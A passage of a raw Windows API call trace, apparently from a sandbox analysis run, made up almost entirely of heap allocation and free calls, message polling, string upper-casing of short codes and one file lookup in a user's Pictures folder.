hHeap=0x2af0000) returned 1 [0209.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0209.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0209.692] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0209.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0209.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0209.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0209.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0209.693] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0209.693] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0209.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0209.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0209.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0209.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0209.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0209.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0209.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0209.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0209.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0209.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0209.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0209.693] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0209.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.694] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0209.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0209.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0209.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0209.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0209.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0209.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0209.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0209.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0209.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0209.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0209.694] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0209.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0209.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0209.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0209.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0209.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0209.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0209.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0209.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.696] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0209.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0209.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0209.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0209.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0209.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0209.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0209.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0209.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.696] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0209.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0209.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0209.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0209.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0209.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0209.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0209.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0209.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0209.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0209.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0209.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0209.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.697] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/E8Pb7e.bmp", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb36f5700, ftCreationTime.dwHighDateTime=0x1d5ce58, ftLastAccessTime.dwLowDateTime=0x3b49d730, ftLastAccessTime.dwHighDateTime=0x1d5c996, ftLastWriteTime.dwLowDateTime=0x3b49d730, ftLastWriteTime.dwHighDateTime=0x1d5c996, nFileSizeHigh=0x0, nFileSizeLow=0xfbd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="E8Pb7e.bmp", cAlternateFileName="")) returned 0x9e2078 [0209.697] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0209.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0209.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.699] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0209.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0209.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0209.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0209.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0209.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0209.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0209.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0209.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0209.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0209.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.700] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.700] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0209.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0209.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.700] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.700] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0209.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0209.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0209.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.700] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0209.700] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.700] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0209.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.701] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.701] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0209.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0209.701] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0209.701] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0209.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0209.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0209.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.701] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 